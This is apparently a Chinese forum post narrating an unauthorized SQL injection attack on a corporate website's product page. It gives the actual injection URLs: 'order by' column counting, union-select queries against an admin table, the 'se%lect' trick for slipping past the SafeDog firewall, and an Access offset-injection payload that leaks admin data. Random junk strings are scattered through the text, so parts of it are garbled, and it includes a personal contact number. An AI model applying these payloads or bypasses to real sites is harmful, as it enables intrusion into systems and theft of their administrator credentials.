打开网站,一个企业站。 f: w! i! v: Q6 i1 m1 m- ]
, h0 \4 U" H& o3 I7 | t& [! a
' V3 F4 Q1 N. u: l
顺手加个admin# d) R, }) m* T) i4 q
. k. r, z: O( |* O! Z3 \; L- p$ d
9 C. B$ c' B. j' y% h& [默认后台。0 f5 U" [ d4 ?
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
( b6 i. P2 r! |2 X# C& o. k( U+ D0 b; p
; B( K2 i' d! K9 P5 u; f
1 r# ^" y N4 A5 l5 ]: K
所以就不用御剑扫了,待会直接封IP。
9 K8 _3 R; s: k! J9 E3 d
$ \+ L6 i; {% y# _5 [用order by语句判断是否存在注入。, `# ]0 M" D0 _
http://www.xxx.com /product_show.asp?id=997 order by 17 C8 r+ W5 {: I4 a" c9 o: E
http://www.xxx.com /product_show.asp?id=997 order by 100
/ t: O( C0 Z/ d' Z现在存在注入,经测试后发现是9个字段。. @6 J) P% X( ?, d# q; I" z8 B
0 w w% w- S1 Z* Z O接下来进行联合查询,猜是否存在admin表。/ ?* V) r6 [) T
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。, z) M" ^6 Q' F/ N$ B
3 Z$ Z9 x$ E2 F4 a9 P4 J
1 W. m! F5 g1 j$ z0 u2 i
0 h7 W4 Z$ x# ?$ v在select中间加个%,se%lect绕过安全狗。
* p: _4 C5 M+ ~7 ~0 k1 w
, G4 \( }& v: L0 V' W. c2 L. z1 t( E& [3 W2 Z2 X6 X4 b
发现存在admin表,然后开始手工猜常用的字段。
) a+ F' P$ s8 A9 n8 ?+ L0 N" w纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。+ s" c+ }) k- Q# ^7 Y. {
& N. R+ }. W5 K
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。2 Z$ p& ]4 v1 k6 S8 s# |$ _7 c
/ w# o$ N! P) n1 k8 |$ I' l, [/ U科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。* U& T: j1 M$ Q( j
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin& s9 l% M, ?6 S8 o: s( j
好了,敏感内容出显了。
/ G1 k+ ~1 H& Y7 I e9 u$ g% g7 {$ P- C K) G. s
; x+ \9 k1 B$ C% E
0 I; K% t( o- F: r |